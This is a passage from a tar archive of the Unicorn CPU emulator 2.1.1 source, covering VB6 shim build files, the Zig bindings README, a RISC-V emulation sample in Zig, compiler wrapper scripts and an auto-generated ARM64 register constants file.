Sub interrupt_hook(ByVal uc As Long, ByVal intno As Long, ByVal user_data As Long) Dim u As ucIntel32 Set u = findInstance(user_data) If u Is Nothing Then Exit Sub u.internal_interrupt_hook intno End Sub �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/ucvbshim.sln�������������������������������������������������������������0000664�0000000�0000000�00000001561�14675241067�0020037�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ Microsoft Visual Studio Solution File, Format Version 10.00 # Visual Studio 2008 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ucvbshim", "ucvbshim.vcproj", "{6FC797B7-2985-49C8-92CD-CA985AF3511C}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Win32 = Debug|Win32 Release|Win32 = Release|Win32 EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Debug|Win32.ActiveCfg = Debug|Win32 {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Debug|Win32.Build.0 = Debug|Win32 {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Release|Win32.ActiveCfg = 
Release|Win32 {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Release|Win32.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE EndGlobalSection EndGlobal �����������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/ucvbshim.vcproj����������������������������������������������������������0000664�0000000�0000000�00000010147�14675241067�0020546�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?xml version="1.0" encoding="Windows-1252"?> <VisualStudioProject ProjectType="Visual C++" Version="9.00" Name="ucvbshim" ProjectGUID="{6FC797B7-2985-49C8-92CD-CA985AF3511C}" RootNamespace="My1" Keyword="Win32Proj" TargetFrameworkVersion="196613" > <Platforms> <Platform Name="Win32" /> </Platforms> <ToolFiles> </ToolFiles> <Configurations> <Configuration Name="Debug|Win32" OutputDirectory="$(SolutionDir)$(ConfigurationName)" IntermediateDirectory="$(ConfigurationName)" ConfigurationType="2" CharacterSet="2" > <Tool Name="VCPreBuildEventTool" /> <Tool Name="VCCustomBuildTool" /> <Tool Name="VCXMLDataGeneratorTool" /> <Tool Name="VCWebServiceProxyGeneratorTool" /> <Tool Name="VCMIDLTool" /> <Tool Name="VCCLCompilerTool" Optimization="0" AdditionalIncludeDirectories="./../../include/" PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE;" MinimalRebuild="true" BasicRuntimeChecks="3" RuntimeLibrary="1" UsePrecompiledHeader="0" WarningLevel="3" DebugInformationFormat="4" /> <Tool Name="VCManagedResourceCompilerTool" /> <Tool Name="VCResourceCompilerTool" /> <Tool Name="VCPreLinkEventTool" /> <Tool Name="VCLinkerTool" OutputFile="./ucvbshim.dll" LinkIncremental="2" GenerateManifest="false" ModuleDefinitionFile="" GenerateDebugInformation="true" SubSystem="1" TargetMachine="1" /> <Tool Name="VCALinkTool" /> <Tool Name="VCManifestTool" EmbedManifest="false" /> <Tool Name="VCXDCMakeTool" /> <Tool Name="VCBscMakeTool" /> <Tool Name="VCFxCopTool" /> <Tool Name="VCAppVerifierTool" /> <Tool Name="VCPostBuildEventTool" /> </Configuration> <Configuration Name="Release|Win32" OutputDirectory="$(SolutionDir)$(ConfigurationName)" IntermediateDirectory="$(ConfigurationName)" ConfigurationType="2" CharacterSet="2" WholeProgramOptimization="1" > <Tool Name="VCPreBuildEventTool" /> <Tool Name="VCCustomBuildTool" /> <Tool Name="VCXMLDataGeneratorTool" /> <Tool Name="VCWebServiceProxyGeneratorTool" /> <Tool Name="VCMIDLTool" /> <Tool Name="VCCLCompilerTool" Optimization="2" EnableIntrinsicFunctions="true" AdditionalIncludeDirectories="./../../include/" PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE;" RuntimeLibrary="0" EnableFunctionLevelLinking="true" UsePrecompiledHeader="0" WarningLevel="3" DebugInformationFormat="3" /> <Tool Name="VCManagedResourceCompilerTool" /> <Tool Name="VCResourceCompilerTool" /> <Tool Name="VCPreLinkEventTool" /> <Tool Name="VCLinkerTool" OutputFile="./ucvbshim.dll" LinkIncremental="1" GenerateManifest="false" GenerateDebugInformation="true" SubSystem="1" OptimizeReferences="2" EnableCOMDATFolding="2" TargetMachine="1" /> <Tool Name="VCALinkTool" /> <Tool Name="VCManifestTool" EmbedManifest="false" /> <Tool Name="VCXDCMakeTool" /> <Tool 
Name="VCBscMakeTool" /> <Tool Name="VCFxCopTool" /> <Tool Name="VCAppVerifierTool" /> <Tool Name="VCPostBuildEventTool" /> </Configuration> </Configurations> <References> </References> <Files> <Filter Name="Source Files" Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx" UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}" > <File RelativePath=".\main.cpp" > </File> </Filter> <Filter Name="Header Files" Filter="h;hpp;hxx;hm;inl;inc;xsd" UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}" > <File RelativePath="..\..\include\unicorn\unicorn.h" > </File> <File RelativePath="..\..\include\x86.h" > </File> </Filter> </Files> <Globals> </Globals> </VisualStudioProject> �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015572�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/README.md����������������������������������������������������������������0000664�0000000�0000000�00000001257�14675241067�0017056�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Unicorn-engine-Zig [Zig](https://ziglang.org/) bindings for the [Unicorn](http://www.unicorn-engine.org/) emulator with utility functions. *Unicorn* is a lightweight multi-platform, multi-architecture CPU emulator framework based on [QEMU](http://www.qemu.org/). 
## How to use

Using the [Zig Build System](https://ziglang.org/learn/build-system/), you can include the following in your local `build.zig.zon`:

```zig
.{
    .dependencies = .{
        .unicorn = .{
            .url = "https://github.com/unicorn-engine/unicorn/archive/<ref SHA>.tar.gz",
            .hash = "<hash>",
        },
    },
}
```

Note that currently the only module exported publicly is `unicorn-sys`.
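A minimal consumer `build.zig` might then wire that dependency in as sketched below. This is an assumption for illustration only: the executable name `demo`, the root source path `src/main.zig`, and the import alias are placeholders, not part of this repository.

```zig
// Hypothetical consumer build.zig (sketch): fetches the `unicorn` dependency
// declared in build.zig.zon and exposes its `unicorn-sys` module.
const std = @import("std");

pub fn build(b: *std.Build) void {
    const target = b.standardTargetOptions(.{});
    const optimize = b.standardOptimizeOption(.{});

    const unicorn_dep = b.dependency("unicorn", .{});

    const exe = b.addExecutable(.{
        .name = "demo", // placeholder name
        .root_source_file = b.path("src/main.zig"), // placeholder path
        .target = target,
        .optimize = optimize,
    });

    // In src/main.zig: const unicorn = @import("unicorn-sys");
    exe.root_module.addImport("unicorn-sys", unicorn_dep.module("unicorn-sys"));

    b.installArtifact(exe);
}
```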
unicorn-2.1.1/bindings/zig/sample/
unicorn-2.1.1/bindings/zig/sample/sample_riscv_zig.zig

//! Based on: ../../../samples/sample_riscv.c

const unicorn = @import("unicorn");
const unicornC = unicorn.c;
const log = unicorn.log;

const RISCV_CODE = "\x13\x05\x10\x00\x93\x85\x05\x02";
const ADDRESS = 0x10000;

pub fn main() !void {
    try test_recover_from_illegal();
    log.info("------------------", .{});
    try test_riscv2();
    log.info("------------------", .{});
    try test_riscv_func_return();
}

fn hook_block(uc: ?*unicornC.uc_engine, address: u64, size: u32, user_data: ?*anyopaque) callconv(.C) void {
    _ = user_data;
    _ = uc;
    log.info(">>> Tracing basic block at 0x{}, block size = 0x{}", .{ address, size });
}

fn hook_code(uc: ?*unicornC.uc_engine, address: u64, size: u32, user_data: ?*anyopaque) callconv(.C) void {
    _ = user_data;
    _ = uc;
    log.info(">>> Tracing instruction at 0x{}, instruction size = 0x{}", .{ address, size });
}

fn hook_code3(uc: ?*unicornC.uc_engine, address: u64, size: u32, user_data: ?*anyopaque) callconv(.C) void {
    _ = user_data;
    log.info(">>> Tracing instruction at 0x{}, instruction size = 0x{}", .{ address, size });
    if (address == ADDRESS) {
        log.info("stop emulation", .{});
        unicorn.uc_emu_stop(uc) catch |err| log.err("Error: {}", .{err});
    }
}

fn hook_memalloc(uc: ?*unicornC.uc_engine, @"type": unicornC.uc_mem_type, address: u64, size: u32, user_data: ?*anyopaque) callconv(.C) bool {
    _ = user_data;
    _ = @"type";
    const aligned_address = address & 0xFFFFFFFFFFFFF000; // round down to page boundary
    const aligned_size = (@as(u32, @intCast(size / 0x1000)) + 1) * 0x1000; // round up to whole pages
    log.info(">>> Allocating block at 0x{} (0x{}), block size = 0x{} (0x{})", .{ address, aligned_address, size, aligned_size });
    unicorn.uc_mem_map(uc, aligned_address, aligned_size, unicornC.UC_PROT_ALL) catch |err| log.err("Error: {}", .{err});
    // this recovers from missing memory, so we return true
    return true;
}

fn test_recover_from_illegal() !void {
    var uc: ?*unicornC.uc_engine = null;
    var trace1: unicornC.uc_hook = undefined;
    var trace2: unicornC.uc_hook = undefined;
    var mem_alloc: unicornC.uc_hook = undefined;
    var a0: u64 = 0x1234;
    var a1: u64 = 0x7890;

    log.info("Emulate RISCV code: recover_from_illegal", .{});

    // Initialize emulator in RISCV64 mode
    unicorn.uc_open(unicornC.UC_ARCH_RISCV, unicornC.UC_MODE_RISCV64, &uc) catch |err| {
        log.err("Failed on uc_open() with error returned: {}", .{err});
        return;
    };

    try unicorn.uc_reg_write(uc, unicornC.UC_RISCV_REG_A0, &a0);
    try unicorn.uc_reg_write(uc, unicornC.UC_RISCV_REG_A1, &a1);

    // map 2MB memory for this emulation
    try unicorn.uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, unicornC.UC_PROT_ALL);

    // auto-allocate memory on access
    try unicorn.uc_hook_add(uc, &mem_alloc, unicornC.UC_HOOK_MEM_UNMAPPED, @as(?*anyopaque, @ptrCast(@constCast(&hook_memalloc))), null, 1, 0);

    // tracing all basic blocks with customized callback
    try unicorn.uc_hook_add(uc, &trace1, unicornC.UC_HOOK_BLOCK, @as(?*anyopaque, @ptrCast(@constCast(&hook_block))), null, 1, 0);

    // tracing all instructions
    try unicorn.uc_hook_add(uc, &trace2, unicornC.UC_HOOK_CODE, @as(?*anyopaque, @ptrCast(@constCast(&hook_code))), null, 1, 0);

    // write machine code to be emulated to memory (in Zig, .len already
    // excludes any terminator, unlike sizeof(...) - 1 in the C sample)
    try unicorn.uc_mem_write(uc, ADDRESS, RISCV_CODE, RISCV_CODE.len);

    // emulate 1 instruction, wrong address, illegal code
    unicorn.uc_emu_start(uc, 0x1000, @as(u64, @bitCast(@as(i64, -1))), 0, 1) catch |err|
        log.err("Expected Illegal Instruction error, got: {} ({s})", .{ err, unicorn.uc_strerror(err) });

    // emulate 1 instruction, correct address, valid code
    unicorn.uc_emu_start(uc, ADDRESS, @as(u64, @bitCast(@as(i64, -1))), 0, 1) catch |err|
        log.err("Failed on uc_emu_start() with error returned: {}", .{err});

    // now print out some registers
    log.info(">>> Emulation done. Below is the CPU context", .{});
    try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A0, @as(?*anyopaque, @ptrCast(@constCast(&a0))));
    try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A1, @as(?*anyopaque, @ptrCast(@constCast(&a1))));
    log.info(">>> A0 = 0x{}", .{a0});
    log.info(">>> A1 = 0x{}", .{a1});

    try unicorn.uc_close(uc);
}
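// Note on the pattern above (added commentary, not in the original sample):
// a UC_HOOK_MEM_UNMAPPED callback that maps the missing page and returns
// true tells Unicorn to retry the faulting access, so emulation continues
// transparently; returning false instead aborts uc_emu_start() with a
// ReadUnmapped/WriteUnmapped error.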
fn test_riscv_func_return() !void {
    var uc: ?*unicornC.uc_engine = null;
    var trace1: unicornC.uc_hook = undefined;
    var trace2: unicornC.uc_hook = undefined;
    var pc: u64 = 0;
    var ra: u64 = 0;

    const CODE = "\x67\x80\x00\x00\x82\x80\x01\x00\x01\x00";

    log.info("Emulate RISCV code: return from func", .{});

    // Initialize emulator in RISCV64 mode
    unicorn.uc_open(unicornC.UC_ARCH_RISCV, unicornC.UC_MODE_RISCV64, &uc) catch |err| {
        log.err("Failed on uc_open() with error returned: {} ({s})", .{ err, unicorn.uc_strerror(err) });
        return;
    };

    // map 2MB memory for this emulation
    try unicorn.uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, unicornC.UC_PROT_ALL);

    // write machine code to be emulated to memory
    try unicorn.uc_mem_write(uc, ADDRESS, CODE, CODE.len);

    // tracing all basic blocks with customized callback
    try unicorn.uc_hook_add(uc, &trace1, unicornC.UC_HOOK_BLOCK, @as(?*anyopaque, @ptrCast(@constCast(&hook_block))), null, 1, 0);

    // tracing all instructions
    try unicorn.uc_hook_add(uc, &trace2, unicornC.UC_HOOK_CODE, @as(?*anyopaque, @ptrCast(@constCast(&hook_code))), null, 1, 0);

    ra = 0x10006;
    try unicorn.uc_reg_write(uc, unicornC.UC_RISCV_REG_RA, @as(?*anyopaque, @ptrCast(@constCast(&ra))));

    log.info("========", .{});

    // execute the c.ret instruction
    unicorn.uc_emu_start(uc, 0x10004, @as(u64, @bitCast(@as(i64, -1))), 0, 1) catch |err| {
        log.err("Failed on uc_emu_start() with error returned: {}", .{err});
    };

    try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_PC, @as(?*anyopaque, @ptrCast(@constCast(&pc))));

    if (pc != ra) {
        log.info("Error after execution: PC is: 0x{}, expected was 0x{}", .{ pc, ra });
        if (pc == 0x10004) {
            log.info("  PC did not change during execution", .{});
        }
    } else {
        log.info("Good, PC == RA", .{});
    }

    // now print out some registers
    log.info(">>> Emulation done.", .{});

    try unicorn.uc_close(uc);
}
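// The repeated `@as(?*anyopaque, @ptrCast(@constCast(&reg)))` casts in these
// samples only erase the pointer type for the C API. A tiny helper such as
// the one below (an illustrative addition, not part of the original sample)
// keeps call sites shorter:
fn regPtr(ptr: anytype) ?*anyopaque {
    return @as(?*anyopaque, @ptrCast(@constCast(ptr)));
}
// usage: try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A0, regPtr(&a0));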
fn test_riscv2() !void {
    var uc: ?*unicornC.uc_engine = null;
    var trace1: unicornC.uc_hook = undefined;
    var trace2: unicornC.uc_hook = undefined;
    var a0: u32 = 0x1234;
    var a1: u32 = 0x7890;

    log.info("Emulate RISCV code: split emulation", .{});

    // Initialize emulator in RISCV32 mode
    unicorn.uc_open(unicornC.UC_ARCH_RISCV, unicornC.UC_MODE_RISCV32, &uc) catch |err| {
        log.err("Failed on unicornC.uc_open() with error returned: {} ({s})", .{ err, unicorn.uc_strerror(err) });
        return;
    };

    // map 2MB memory for this emulation
    try unicorn.uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, unicornC.UC_PROT_ALL);

    // write machine code to be emulated to memory
    try unicorn.uc_mem_write(uc, ADDRESS, RISCV_CODE, RISCV_CODE.len);

    // initialize machine registers
    try unicorn.uc_reg_write(uc, unicornC.UC_RISCV_REG_A0, @as(?*anyopaque, @ptrCast(@constCast(&a0))));
    try unicorn.uc_reg_write(uc, unicornC.UC_RISCV_REG_A1, @as(?*anyopaque, @ptrCast(@constCast(&a1))));

    // tracing all basic blocks with customized callback
    try unicorn.uc_hook_add(uc, &trace1, unicornC.UC_HOOK_BLOCK, @as(?*anyopaque, @ptrCast(@constCast(&hook_block))), null, 1, 0);

    // tracing all instructions
    try unicorn.uc_hook_add(uc, &trace2, unicornC.UC_HOOK_CODE, @as(?*anyopaque, @ptrCast(@constCast(&hook_code))), null, 1, 0);

    // emulate 1 instruction
    unicorn.uc_emu_start(uc, ADDRESS, ADDRESS + 4, 0, 0) catch |err| {
        log.err("Failed on unicornC.uc_emu_start() with error returned: {}", .{err});
    };

    try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A0, @as(?*anyopaque, @ptrCast(@constCast(&a0))));
    try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A1, @as(?*anyopaque, @ptrCast(@constCast(&a1))));
    log.info(">>> A0 = 0x{}", .{a0});
    log.info(">>> A1 = 0x{}", .{a1});

    // emulate one more instruction
    unicorn.uc_emu_start(uc, ADDRESS + 4, ADDRESS + 8, 0, 0) catch |err| {
        log.err("Failed on unicornC.uc_emu_start() with error returned: {}", .{err});
    };

    // now print out some registers
    log.info(">>> Emulation done. Below is the CPU context", .{});
    try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A0, @as(?*anyopaque, @ptrCast(@constCast(&a0))));
    try unicorn.uc_reg_read(uc, unicornC.UC_RISCV_REG_A1, @as(?*anyopaque, @ptrCast(@constCast(&a1))));
    log.info(">>> A0 = 0x{}", .{a0});
    log.info(">>> A1 = 0x{}", .{a1});

    try unicorn.uc_close(uc);
}

unicorn-2.1.1/bindings/zig/tools/
unicorn-2.1.1/bindings/zig/tools/zigcc.cmd

@echo off
zig cc -fno-sanitize=all %*

unicorn-2.1.1/bindings/zig/tools/zigcc.sh

#!
/usr/bin/env bash `which zig` cc -fno-sanitize=all $@�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/�����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017247�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/arm64_const.zig��������������������������������������������������0000664�0000000�0000000�00000016143�14675241067�0022126�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const arm64Const = enum(c_int) { // ARM64 CPU CPU_ARM64_A57 = 0, CPU_ARM64_A53 = 1, CPU_ARM64_A72 = 2, CPU_ARM64_MAX = 3, CPU_ARM64_ENDING = 4, // ARM64 registers ARM64_REG_INVALID = 0, ARM64_REG_X29 = 1, ARM64_REG_X30 = 2, ARM64_REG_NZCV = 3, ARM64_REG_SP = 4, ARM64_REG_WSP = 5, ARM64_REG_WZR = 6, ARM64_REG_XZR = 7, ARM64_REG_B0 = 8, ARM64_REG_B1 = 9, ARM64_REG_B2 = 10, ARM64_REG_B3 = 11, ARM64_REG_B4 = 12, ARM64_REG_B5 = 13, ARM64_REG_B6 = 14, ARM64_REG_B7 = 15, ARM64_REG_B8 = 16, ARM64_REG_B9 = 17, ARM64_REG_B10 = 18, ARM64_REG_B11 = 19, ARM64_REG_B12 = 20, ARM64_REG_B13 = 21, ARM64_REG_B14 = 22, ARM64_REG_B15 = 23, ARM64_REG_B16 = 24, ARM64_REG_B17 = 25, ARM64_REG_B18 = 26, ARM64_REG_B19 = 27, ARM64_REG_B20 = 28, ARM64_REG_B21 = 29, ARM64_REG_B22 = 30, ARM64_REG_B23 = 31, ARM64_REG_B24 = 32, ARM64_REG_B25 = 33, ARM64_REG_B26 = 34, ARM64_REG_B27 = 35, ARM64_REG_B28 = 36, ARM64_REG_B29 = 37, ARM64_REG_B30 = 38, ARM64_REG_B31 = 39, ARM64_REG_D0 = 40, ARM64_REG_D1 = 41, ARM64_REG_D2 = 42, ARM64_REG_D3 = 43, ARM64_REG_D4 = 44, ARM64_REG_D5 = 45, ARM64_REG_D6 = 46, ARM64_REG_D7 = 47, ARM64_REG_D8 = 48, ARM64_REG_D9 = 49, ARM64_REG_D10 = 50, ARM64_REG_D11 = 51, ARM64_REG_D12 = 52, ARM64_REG_D13 = 53, ARM64_REG_D14 = 54, ARM64_REG_D15 = 55, ARM64_REG_D16 = 56, ARM64_REG_D17 = 57, ARM64_REG_D18 = 58, ARM64_REG_D19 = 59, ARM64_REG_D20 = 60, ARM64_REG_D21 = 61, ARM64_REG_D22 = 62, ARM64_REG_D23 = 63, ARM64_REG_D24 = 64, ARM64_REG_D25 = 65, ARM64_REG_D26 = 66, ARM64_REG_D27 = 67, ARM64_REG_D28 = 68, ARM64_REG_D29 = 69, ARM64_REG_D30 = 70, ARM64_REG_D31 = 71, ARM64_REG_H0 = 72, ARM64_REG_H1 = 73, ARM64_REG_H2 = 74, ARM64_REG_H3 = 75, ARM64_REG_H4 = 76, ARM64_REG_H5 = 77, ARM64_REG_H6 = 78, ARM64_REG_H7 = 79, ARM64_REG_H8 = 80, ARM64_REG_H9 = 81, ARM64_REG_H10 = 82, ARM64_REG_H11 = 83, ARM64_REG_H12 = 84, ARM64_REG_H13 = 85, ARM64_REG_H14 = 86, ARM64_REG_H15 = 87, ARM64_REG_H16 = 88, ARM64_REG_H17 = 89, ARM64_REG_H18 = 90, ARM64_REG_H19 = 
91, ARM64_REG_H20 = 92, ARM64_REG_H21 = 93, ARM64_REG_H22 = 94, ARM64_REG_H23 = 95, ARM64_REG_H24 = 96, ARM64_REG_H25 = 97, ARM64_REG_H26 = 98, ARM64_REG_H27 = 99, ARM64_REG_H28 = 100, ARM64_REG_H29 = 101, ARM64_REG_H30 = 102, ARM64_REG_H31 = 103, ARM64_REG_Q0 = 104, ARM64_REG_Q1 = 105, ARM64_REG_Q2 = 106, ARM64_REG_Q3 = 107, ARM64_REG_Q4 = 108, ARM64_REG_Q5 = 109, ARM64_REG_Q6 = 110, ARM64_REG_Q7 = 111, ARM64_REG_Q8 = 112, ARM64_REG_Q9 = 113, ARM64_REG_Q10 = 114, ARM64_REG_Q11 = 115, ARM64_REG_Q12 = 116, ARM64_REG_Q13 = 117, ARM64_REG_Q14 = 118, ARM64_REG_Q15 = 119, ARM64_REG_Q16 = 120, ARM64_REG_Q17 = 121, ARM64_REG_Q18 = 122, ARM64_REG_Q19 = 123, ARM64_REG_Q20 = 124, ARM64_REG_Q21 = 125, ARM64_REG_Q22 = 126, ARM64_REG_Q23 = 127, ARM64_REG_Q24 = 128, ARM64_REG_Q25 = 129, ARM64_REG_Q26 = 130, ARM64_REG_Q27 = 131, ARM64_REG_Q28 = 132, ARM64_REG_Q29 = 133, ARM64_REG_Q30 = 134, ARM64_REG_Q31 = 135, ARM64_REG_S0 = 136, ARM64_REG_S1 = 137, ARM64_REG_S2 = 138, ARM64_REG_S3 = 139, ARM64_REG_S4 = 140, ARM64_REG_S5 = 141, ARM64_REG_S6 = 142, ARM64_REG_S7 = 143, ARM64_REG_S8 = 144, ARM64_REG_S9 = 145, ARM64_REG_S10 = 146, ARM64_REG_S11 = 147, ARM64_REG_S12 = 148, ARM64_REG_S13 = 149, ARM64_REG_S14 = 150, ARM64_REG_S15 = 151, ARM64_REG_S16 = 152, ARM64_REG_S17 = 153, ARM64_REG_S18 = 154, ARM64_REG_S19 = 155, ARM64_REG_S20 = 156, ARM64_REG_S21 = 157, ARM64_REG_S22 = 158, ARM64_REG_S23 = 159, ARM64_REG_S24 = 160, ARM64_REG_S25 = 161, ARM64_REG_S26 = 162, ARM64_REG_S27 = 163, ARM64_REG_S28 = 164, ARM64_REG_S29 = 165, ARM64_REG_S30 = 166, ARM64_REG_S31 = 167, ARM64_REG_W0 = 168, ARM64_REG_W1 = 169, ARM64_REG_W2 = 170, ARM64_REG_W3 = 171, ARM64_REG_W4 = 172, ARM64_REG_W5 = 173, ARM64_REG_W6 = 174, ARM64_REG_W7 = 175, ARM64_REG_W8 = 176, ARM64_REG_W9 = 177, ARM64_REG_W10 = 178, ARM64_REG_W11 = 179, ARM64_REG_W12 = 180, ARM64_REG_W13 = 181, ARM64_REG_W14 = 182, ARM64_REG_W15 = 183, ARM64_REG_W16 = 184, ARM64_REG_W17 = 185, ARM64_REG_W18 = 186, ARM64_REG_W19 = 187, ARM64_REG_W20 = 188, ARM64_REG_W21 = 189, ARM64_REG_W22 = 190, ARM64_REG_W23 = 191, ARM64_REG_W24 = 192, ARM64_REG_W25 = 193, ARM64_REG_W26 = 194, ARM64_REG_W27 = 195, ARM64_REG_W28 = 196, ARM64_REG_W29 = 197, ARM64_REG_W30 = 198, ARM64_REG_X0 = 199, ARM64_REG_X1 = 200, ARM64_REG_X2 = 201, ARM64_REG_X3 = 202, ARM64_REG_X4 = 203, ARM64_REG_X5 = 204, ARM64_REG_X6 = 205, ARM64_REG_X7 = 206, ARM64_REG_X8 = 207, ARM64_REG_X9 = 208, ARM64_REG_X10 = 209, ARM64_REG_X11 = 210, ARM64_REG_X12 = 211, ARM64_REG_X13 = 212, ARM64_REG_X14 = 213, ARM64_REG_X15 = 214, ARM64_REG_X16 = 215, ARM64_REG_X17 = 216, ARM64_REG_X18 = 217, ARM64_REG_X19 = 218, ARM64_REG_X20 = 219, ARM64_REG_X21 = 220, ARM64_REG_X22 = 221, ARM64_REG_X23 = 222, ARM64_REG_X24 = 223, ARM64_REG_X25 = 224, ARM64_REG_X26 = 225, ARM64_REG_X27 = 226, ARM64_REG_X28 = 227, ARM64_REG_V0 = 228, ARM64_REG_V1 = 229, ARM64_REG_V2 = 230, ARM64_REG_V3 = 231, ARM64_REG_V4 = 232, ARM64_REG_V5 = 233, ARM64_REG_V6 = 234, ARM64_REG_V7 = 235, ARM64_REG_V8 = 236, ARM64_REG_V9 = 237, ARM64_REG_V10 = 238, ARM64_REG_V11 = 239, ARM64_REG_V12 = 240, ARM64_REG_V13 = 241, ARM64_REG_V14 = 242, ARM64_REG_V15 = 243, ARM64_REG_V16 = 244, ARM64_REG_V17 = 245, ARM64_REG_V18 = 246, ARM64_REG_V19 = 247, ARM64_REG_V20 = 248, ARM64_REG_V21 = 249, ARM64_REG_V22 = 250, ARM64_REG_V23 = 251, ARM64_REG_V24 = 252, ARM64_REG_V25 = 253, ARM64_REG_V26 = 254, ARM64_REG_V27 = 255, ARM64_REG_V28 = 256, ARM64_REG_V29 = 257, ARM64_REG_V30 = 258, ARM64_REG_V31 = 259, // pseudo registers ARM64_REG_PC = 260, ARM64_REG_CPACR_EL1 = 261, // thread 
registers, deprecated, use UC_ARM64_REG_CP_REG instead ARM64_REG_TPIDR_EL0 = 262, ARM64_REG_TPIDRRO_EL0 = 263, ARM64_REG_TPIDR_EL1 = 264, ARM64_REG_PSTATE = 265, // exception link registers, deprecated, use UC_ARM64_REG_CP_REG instead ARM64_REG_ELR_EL0 = 266, ARM64_REG_ELR_EL1 = 267, ARM64_REG_ELR_EL2 = 268, ARM64_REG_ELR_EL3 = 269, // stack pointer registers, deprecated, use UC_ARM64_REG_CP_REG instead ARM64_REG_SP_EL0 = 270, ARM64_REG_SP_EL1 = 271, ARM64_REG_SP_EL2 = 272, ARM64_REG_SP_EL3 = 273, // other CP15 registers, deprecated, use UC_ARM64_REG_CP_REG instead ARM64_REG_TTBR0_EL1 = 274, ARM64_REG_TTBR1_EL1 = 275, ARM64_REG_ESR_EL0 = 276, ARM64_REG_ESR_EL1 = 277, ARM64_REG_ESR_EL2 = 278, ARM64_REG_ESR_EL3 = 279, ARM64_REG_FAR_EL0 = 280, ARM64_REG_FAR_EL1 = 281, ARM64_REG_FAR_EL2 = 282, ARM64_REG_FAR_EL3 = 283, ARM64_REG_PAR_EL1 = 284, ARM64_REG_MAIR_EL1 = 285, ARM64_REG_VBAR_EL0 = 286, ARM64_REG_VBAR_EL1 = 287, ARM64_REG_VBAR_EL2 = 288, ARM64_REG_VBAR_EL3 = 289, ARM64_REG_CP_REG = 290, // floating point control and status registers ARM64_REG_FPCR = 291, ARM64_REG_FPSR = 292, ARM64_REG_ENDING = 293, // alias registers ARM64_REG_IP0 = 215, ARM64_REG_IP1 = 216, ARM64_REG_FP = 1, ARM64_REG_LR = 2, // ARM64 instructions ARM64_INS_INVALID = 0, ARM64_INS_MRS = 1, ARM64_INS_MSR = 2, ARM64_INS_SYS = 3, ARM64_INS_SYSL = 4, ARM64_INS_ENDING = 5, };
unicorn-2.1.1/bindings/zig/unicorn/arm_const.zig
// For Unicorn Engine.
